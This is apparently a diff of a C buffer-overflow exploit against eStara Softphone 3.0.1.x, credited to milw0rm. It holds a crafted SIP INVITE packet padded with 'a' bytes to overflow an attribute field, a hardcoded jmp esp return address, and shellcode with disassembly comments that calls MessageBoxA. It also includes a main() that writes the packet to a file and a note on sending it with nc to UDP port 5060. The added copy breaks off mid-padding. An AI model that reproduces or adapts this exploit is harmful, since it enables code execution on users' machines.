-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
-	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61
-};
-
-unsigned char jmpesp[] ={ //jmpesp=0x7ffa4512;
-	0x12, 0x45, 0xfa, 0x7f
-};
-
-unsigned char end[] = {
-	0x32, 0x33, 0x34, 0x35, 0x36, 
-	0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 
-	0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 
-	0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 
-	0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 
-	0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x3A, 0x30, 0x20, 0x50, 0x43, 0x4D, 0x55, 0x2F, 
-	0x38, 0x30, 0x30, 0x30, 0x0D, 0x0A
-};
-
-
-
-unsigned char scode[] =
-"\xB8"
-"\x75\xC1\xe4\x88" //Address of MessageBoxA + 0x11111111
-"\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68"
-"\x68\x61\x63\x6b"	//"hack"
-"\x54\x5a\x50\x52\x52\x50\x53\x51\xc3";
-
-//Shellcode:
-//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to
-//2D 11111111 SUB EAX,11111111 ; Make characters readable
-//50 PUSH EAX ; xchg registers : eax = 77D3b064
-//59 POP ECX ; Offset to API.
-//33C0 XOR EAX,EAX ; Create Null
-//50 PUSH EAX ; Put ascii0 end of string
-//68 6861636b PUSH 6b636168 ; Create string.= hack
-//54 PUSH ESP ; Get the offset to the 
-//5A POP EDX ; Message String
-//MessageBox call
-//50 PUSH EAX ; Null Pointer
-//52 PUSH EAX ; Message
-//52 PUSH EDX ; Message
-//50 PUSH EAX ; Null Pointer
-//53 PUSH EBX ; Return address: 0x00000000
-//51 PUSH ECX ; Address of MessageBoxA
-//C3 RETN ; Jump 
-
-
-int main()
-{
-	FILE *stream;
-	unsigned char *exploitbuf;
-	int size;
-	char *filename = "sip_overbuf_exploit.dat";
-	DWORD msgboxaddr = (DWORD)MessageBoxA; //Windows XP EN SP2 MessageBoxA address = 0x77d6e824;
-											//If others, just change it;
-
-	size = sizeof(invite)+sizeof(jmpesp)+sizeof(end);
-	exploitbuf = (unsigned char *)malloc(size);
-	printf("exploitbuf len = %d\n", size);
-	memcpy(exploitbuf, invite, sizeof(invite));
-	memcpy(exploitbuf+sizeof(invite), jmpesp, sizeof(jmpesp));
-	memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), end, sizeof(end));
-	*(DWORD *)&scode[1] = msgboxaddr+0x11111111;
-	memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), scode, sizeof(scode));
-	
-
-	if( (stream = fopen( filename, "w+b" )) == NULL )
-		printf("Build File Error!!!\n");	
-	else
-		printf("Build File %s successful! ^_^\n", filename);
-
-	free(exploitbuf);
-	fwrite( exploitbuf, size, 1, stream );
-	fclose(stream);
-}
-
-// milw0rm.com [2006-01-12]
+/***************************************
+eStara Softphone buffer overflow exploit
+tested on :
+	eStara Softphone 3.0.1.14
+		||||||
+	eStara Softphone 3.0.1.46
+Vender website : http://www.estara.com/softphone/softph.exe
+
+Run this application, then use nc to send builded packet :
+nc -u 127.0.0.1 5060 
+#include 
+
+unsigned char invite[] = {
+	0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 
+	0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x0D, 0x0A, 
+	0x56, 0x69, 0x61, 0x3A, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x2F, 0x55, 0x44, 0x50, 
+	0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x3A, 0x33, 0x33, 0x33, 0x33, 
+	0x3B, 0x62, 0x72, 0x61, 0x6E, 0x63, 0x68, 0x3D, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x30, 
+	0x30, 0x30, 0x30, 0x34, 0x31, 0x37, 0x38, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x2E, 0x30, 
+	0x30, 0x30, 0x30, 0x32, 0x46, 0x32, 0x41, 0x0D, 0x0A, 0x46, 0x72, 0x6F, 0x6D, 0x3A, 0x20, 0x34, 
+	0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 
+	0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x3B, 0x74, 0x61, 0x67, 0x3D, 0x34, 0x31, 0x37, 0x38, 0x0D, 0x0A, 
+	0x54, 0x6F, 0x3A, 0x20, 0x52, 0x65, 0x63, 0x65, 0x69, 0x76, 0x65, 0x72, 0x20, 0x3C, 0x73, 0x69, 
+	0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, 
+	0x43, 0x61, 0x6C, 0x6C, 0x2D, 0x49, 0x44, 0x3A, 0x20, 0x32, 0x34, 0x34, 0x33, 0x30, 0x40, 0x31, 
+	0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x43, 0x53, 0x65, 0x71, 0x3A, 
+	0x20, 0x31, 0x38, 0x32, 0x32, 0x35, 0x20, 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x0D, 0x0A, 0x43, 
+	0x6F, 0x6E, 0x74, 0x61, 0x63, 0x74, 0x3A, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, 
+	0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, 
+	0x45, 0x78, 0x70, 0x69, 0x72, 0x65, 0x73, 0x3A, 0x20, 0x31, 0x32, 0x30, 0x30, 0x0D, 0x0A, 0x4D, 
+	0x61, 0x78, 0x2D, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64, 0x73, 0x3A, 0x20, 0x37, 0x30, 0x0D, 
+	0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70, 0x65, 0x3A, 0x20, 0x61, 
+	0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2F, 0x73, 0x64, 0x70, 0x0D, 0x0A, 
+	0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, 
+	0x34, 0x32, 0x32, 0x32, 0x0D, 0x0A, 0x0D, 0x0A, 0x76, 0x3D, 0x30, 0x0D, 0x0A, 0x6F, 0x3D, 0x34, 
+	0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x49, 0x4E, 
+	0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, 
+	0x0A, 0x73, 0x3D, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x53, 0x44, 0x50, 0x0D, 0x0A, 
+	0x63, 0x3D, 0x49, 0x4E, 0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 
+	0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x74, 0x3D, 0x30, 0x20, 0x30, 0x0D, 0x0A, 0x6D, 0x3D, 0x61, 0x75, 
+	0x64, 0x69, 0x6F, 0x20, 0x39, 0x38, 0x37, 0x36, 0x20, 0x52, 0x54, 0x50, 0x2F, 0x41, 0x56, 0x50, 
+	0x20, 0x30, 0x0D, 0x0A, 0x61, 0x3D, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
+	0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
